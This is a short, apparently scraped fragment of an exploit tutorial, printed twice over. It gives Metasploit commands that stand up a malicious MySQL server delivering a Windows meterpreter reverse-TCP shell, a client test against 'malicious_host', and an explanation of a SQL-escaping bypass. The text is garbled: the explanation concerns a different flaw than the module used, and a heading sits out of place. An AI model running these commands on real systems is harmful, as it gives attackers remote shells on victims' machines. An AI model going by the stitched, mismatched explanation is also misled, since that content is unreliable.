use auxiliary/server/mysql/mysql_yassl_hello set SRVHOST 0.0.0.0 set PAYLOAD windows/meterpreter/reverse_tcp exploit
If the client ( mysql -h malicious_host -u root ) crashes, it is vulnerable.
The exploit works by tricking mysql_real_escape_string() into thinking a quote ( ' ) is part of a multi-byte character, therefore not escaping it, which then allows the attacker to close a SQL query prematurely and inject their own commands. The Attack Mechanism
use auxiliary/server/mysql/mysql_yassl_hello set SRVHOST 0.0.0.0 set PAYLOAD windows/meterpreter/reverse_tcp exploit
If the client ( mysql -h malicious_host -u root ) crashes, it is vulnerable.
The exploit works by tricking mysql_real_escape_string() into thinking a quote ( ' ) is part of a multi-byte character, therefore not escaping it, which then allows the attacker to close a SQL query prematurely and inject their own commands. The Attack Mechanism
